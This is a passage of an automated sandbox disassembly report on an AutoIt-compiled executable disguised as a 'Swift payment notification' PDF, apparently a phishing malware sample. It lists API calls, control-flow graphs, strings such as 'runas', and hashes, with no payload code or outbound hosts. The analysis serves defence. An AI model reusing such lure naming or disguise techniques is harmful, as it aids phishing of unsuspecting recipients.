                                                                                                                                • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                              Strings
                                                                                                                              • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                                                              • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                                              • C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, xrefs: 0040D5EB, 0040D61A, 0040D631, 0042E281
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LoadWindow$IconName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
                                                                                                                              • String ID: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                              • API String ID: 3436406043-3422773484
                                                                                                                              • Opcode ID: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                                              • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                              • Opcode Fuzzy Hash: 41e582475c413773e3743a4b8e51b79ae17ec4e07ea1e63541618b073f9d51de
                                                                                                                              • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3964851224-0
                                                                                                                              • Opcode ID: 01cfb8af86b8a321ab3c7963d28fe738a1c25011d395839247dea0cdc54bb549
                                                                                                                              • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                              • Opcode Fuzzy Hash: 01cfb8af86b8a321ab3c7963d28fe738a1c25011d395839247dea0cdc54bb549
                                                                                                                              • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2147 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 2156 40e582-40e583 2147->2156 2157 427674-427679 2147->2157 2160 40e585-40e596 2156->2160 2161 40e5ba-40e5cb call 40ef60 2156->2161 2158 427683-427686 2157->2158 2159 42767b-427681 2157->2159 2164 427693-427696 2158->2164 2165 427688-427691 2158->2165 2163 4276b4-4276be 2159->2163 2166 427625-427629 2160->2166 2167 40e59c-40e59f 2160->2167 2178 40e5ec-40e60c 2161->2178 2179 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2161->2179 2180 4276c6-4276ca GetSystemInfo 2163->2180 2164->2163 2170 427698-4276a8 2164->2170 2165->2163 2172 427636-427640 2166->2172 2173 42762b-427631 2166->2173 2168 40e5a5-40e5ae 2167->2168 2169 427654-427657 2167->2169 2174 40e5b4 2168->2174 2175 427645-42764f 2168->2175 2169->2161 2181 42765d-42766f 2169->2181 2176 4276b0 2170->2176 2177 4276aa-4276ae 2170->2177 2172->2161 2173->2161 2174->2161 2175->2161 2176->2163 2177->2163 2183 40e612-40e623 call 40efd0 2178->2183 2184 4276d5-4276df GetSystemInfo 2178->2184 2179->2178 2191 40e5e8 2179->2191 2180->2184 2181->2161 2183->2180 2189 40e629-40e63f call 40ef90 GetNativeSystemInfo 2183->2189 2193 40e641-40e642 FreeLibrary 2189->2193 2194 40e644-40e651 2189->2194 2191->2178 2193->2194 2195 40e653-40e654 FreeLibrary 2194->2195 2196 40e656-40e65d 2194->2196 2195->2196
                                                                                                                              APIs
                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                              • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion
                                                                                                                              • String ID: 0SH
                                                                                                                              • API String ID: 3079510601-851180471
                                                                                                                              • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                              • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                              • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                              • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2639 40ebd0-40ebd4 2640 40ebf6 2639->2640 2641 40ebd6-40ebe5 LoadLibraryA 2639->2641 2641->2640 2642 40ebe7-40ebf3 GetProcAddress 2641->2642 2642->2640
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: IsThemeActive$uxtheme.dll
                                                                                                                              • API String ID: 2574300362-3542929980
                                                                                                                              • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                              • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                                              • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                              • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00000000), ref: 004339C7
                                                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 004339D8
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 48322524-0
                                                                                                                              • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                              • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                              • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                              • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                              APIs
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                              • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                              • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                              • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                              • API String ID: 1762048999-758534266
                                                                                                                              • Opcode ID: 53775b9fcc2b45695675a1700fd3a41d3558d28109dfe0aa26dd2df15edf3e44
                                                                                                                              • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                              • Opcode Fuzzy Hash: 53775b9fcc2b45695675a1700fd3a41d3558d28109dfe0aa26dd2df15edf3e44
                                                                                                                              • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000000,?,0000000C,00000001,00000080,00000000,00000000,00000109,00000109), ref: 00422643
                                                                                                                              • CreateFileW.KERNEL32(7FFFFFFF,7FFFFFFF,?,0000000C,00000001,00000001,00000000), ref: 0042267C
                                                                                                                              • GetLastError.KERNEL32 ref: 004226A0
                                                                                                                              • GetFileType.KERNELBASE(0040F7E9), ref: 004226BF
                                                                                                                              • GetLastError.KERNEL32 ref: 004226E4
                                                                                                                              • CloseHandle.KERNEL32(0040F7E9), ref: 004226F6
                                                                                                                              • CloseHandle.KERNEL32(0040F7E9), ref: 00422AAD
                                                                                                                              • CreateFileW.KERNEL32(00000000,00000000,?,0000000C,00000003,00000001,00000000), ref: 00422ACD
                                                                                                                              • GetLastError.KERNEL32 ref: 00422AD7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CreateErrorLast$CloseHandle$Type
                                                                                                                              • String ID: @$H
                                                                                                                              • API String ID: 352418905-104103126
                                                                                                                              • Opcode ID: ac6b7e133899bd1f155b47bd1ce6631d63863f3d8535a94e41cc7c4e4de644ad
                                                                                                                              • Instruction ID: a6762e264ba116d74e69880979fe52a2e70c3e31e27682f651d8d28631669406
                                                                                                                              • Opcode Fuzzy Hash: ac6b7e133899bd1f155b47bd1ce6631d63863f3d8535a94e41cc7c4e4de644ad
                                                                                                                              • Instruction Fuzzy Hash: F7223331B04225BBDF219F64EA417AE7BB0EF41304FA4452BE450DB2A1D7FC8981CB59

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                              • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                              • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(009E0468,000000FF,00000000), ref: 00410552
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                                              • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                              • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                              • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                              • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1514 41b0b5-41b0ed call 422240 1517 41b0f6-41b0f8 1514->1517 1518 41b0ef-41b0f1 1514->1518 1520 41b119-41b147 1517->1520 1521 41b0fa-41b114 call 417f8a call 417f77 call 417f25 1517->1521 1519 41b7a4-41b7b1 call 41a208 1518->1519 1523 41b149-41b14c 1520->1523 1524 41b14e-41b156 1520->1524 1521->1519 1523->1524 1527 41b175-41b17a 1523->1527 1524->1527 1528 41b158-41b170 call 417f8a call 417f77 call 417f25 1524->1528 1532 41b18b-41b194 call 42064c 1527->1532 1533 41b17c-41b188 call 420494 1527->1533 1558 41b792-41b795 1528->1558 1543 41b433 1532->1543 1544 41b19a-41b1a1 1532->1544 1533->1532 1546 41b435-41b43c 1543->1546 1544->1543 1547 41b1a7-41b1cf call 417a69 GetConsoleMode 1544->1547 1549 41b6e3-41b6ff WriteFile 1546->1549 1550 41b442-41b44f 1546->1550 1547->1546 1564 41b1d5-41b1d7 1547->1564 1556 41b701-41b714 1549->1556 1557 41b716-41b71c GetLastError 1549->1557 1553 41b455-41b45e 1550->1553 1554 41b4fd-41b504 1550->1554 1562 41b761-41b76e 1553->1562 1563 41b464-41b46e 1553->1563 1560 41b5d7-41b5e6 1554->1560 1561 41b50a-41b513 1554->1561 1565 41b722-41b729 1556->1565 1557->1565 1559 41b7a3 1558->1559 1559->1519 1560->1562 1572 41b5ec-41b607 1560->1572 1561->1562 1566 41b519-41b530 1561->1566 1567 41b770-41b779 1562->1567 1568 41b77f-41b78f call 417f77 call 417f8a 1562->1568 1569 41b474-41b477 1563->1569 1570 41b1e5-41b202 GetConsoleCP 1564->1570 1571 41b1d9-41b1df 1564->1571 1573 41b797-41b79d 1565->1573 1574 41b72b-41b732 1565->1574 1575 41b531-41b534 1566->1575 1567->1568 1576 41b77b-41b77d 1567->1576 1568->1558 1577 41b479-41b486 1569->1577 1578 41b49f-41b4cd WriteFile 1569->1578 1570->1574 1580 41b208 1570->1580 1571->1546 1571->1570 1581 41b608-41b60b 1572->1581 1573->1559 1574->1562 1582 41b734-41b73d 1574->1582 1583 41b536-41b546 1575->1583 1584 41b579-41b5a7 WriteFile 1575->1584 1576->1559 1585 41b493-41b49d 1577->1585 1586 41b488-41b492 1577->1586 1578->1557 1588 41b4d3-41b4e1 1578->1588 1589 41b20e-41b216 1580->1589 1590 41b648-41b679 WideCharToMultiByte 1581->1590 1591 41b60d-41b621 1581->1591 1592 41b753-41b75f call 417f9d 1582->1592 1593 41b73f-41b751 call 417f77 call 417f8a 1582->1593 1596 41b562-41b577 1583->1596 1597 41b548-41b55c 1583->1597 1584->1557 1599 41b5ad-41b5bb 1584->1599 1585->1569 1585->1578 1586->1585 1588->1565 1601 41b4e7-41b4f2 1588->1601 1602 41b383-41b385 1589->1602 1603 41b21c-41b23a 1589->1603 1590->1557 1595 41b67f-41b6a8 WriteFile 1590->1595 1604 41b631-41b646 1591->1604 1605 41b623-41b62b 1591->1605 1592->1558 1593->1558 1607 41b6b6-41b6bc GetLastError 1595->1607 1608 41b6aa-41b6b2 1595->1608 1596->1575 1596->1584 1597->1596 1599->1565 1612 41b5c1-41b5cc 1599->1612 1601->1563 1614 41b4f8 1601->1614 1609 41b387-41b389 1602->1609 1610 41b38b-41b3a6 1602->1610 1615 41b251-41b25d call 4131e9 1603->1615 1616 41b23c-41b24f 1603->1616 1604->1581 1604->1590 1605->1604 1622 41b6c2-41b6c4 1607->1622 1608->1595 1620 41b6b4 1608->1620 1609->1610 1621 41b3ac-41b3ae 1609->1621 1610->1621 1612->1566 1623 41b5d2 1612->1623 1614->1565 1630 41b299-41b29b 1615->1630 1631 41b25f-41b26f 1615->1631 1617 41b29c-41b2ae call 420955 1616->1617 1617->1565 1640 41b2b4-41b2df WideCharToMultiByte 1617->1640 1620->1622 1626 41b3b0-41b3b2 1621->1626 1627 41b3b4-41b3c7 call 4221f0 1621->1627 1622->1565 1628 41b6c6-41b6db 1622->1628 1623->1565 1626->1627 1632 41b406-41b40f 1626->1632 1627->1557 1642 41b3cd-41b3db 1627->1642 1628->1572 1633 41b6e1 1628->1633 1630->1617 1637 41b275-41b28a call 420955 1631->1637 1638 41b41a-41b42e 1631->1638 1632->1589 1636 41b415 1632->1636 1633->1565 1636->1565 1637->1565 1647 41b290-41b297 1637->1647 1638->1565 1640->1565 1643 41b2e5-41b306 WriteFile 1640->1643 1642->1632 1645 41b3dd-41b3f4 call 4221f0 1642->1645 1643->1557 1646 41b30c-41b326 1643->1646 1645->1557 1653 41b3fa-41b400 1645->1653 1646->1565 1649 41b32c-41b333 1646->1649 1647->1640 1649->1632 1650 41b339-41b35f WriteFile 1649->1650 1650->1557 1652 41b365-41b36c 1650->1652 1652->1565 1654 41b372-41b37e 1652->1654 1653->1632 1654->1632
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6010c43569844335b52bd577acf76465956b309f5f524951a45990a878f18f6f
                                                                                                                              • Instruction ID: b1ff9d02dd699c4c9237f7ef83bd3b9726f1dd7de931cba3e9e58faaac2e4408
                                                                                                                              • Opcode Fuzzy Hash: 6010c43569844335b52bd577acf76465956b309f5f524951a45990a878f18f6f
                                                                                                                              • Instruction Fuzzy Hash: FA128D35A012689FCB20CF25CD84AEAB7B4FF06354F0401DAE41AD6A91D7389EC1CF96

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                              • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                              • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                              • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                              • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009E0468,000000FF,00000000), ref: 00410552
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
